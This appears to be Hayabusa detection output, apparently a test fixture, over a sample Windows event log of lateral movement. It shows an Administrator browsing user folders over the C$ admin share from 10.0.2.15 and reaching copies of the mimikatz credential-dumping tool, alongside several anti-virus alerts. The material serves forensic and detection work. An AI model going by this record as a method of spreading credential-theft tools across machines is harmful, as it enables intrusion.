+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
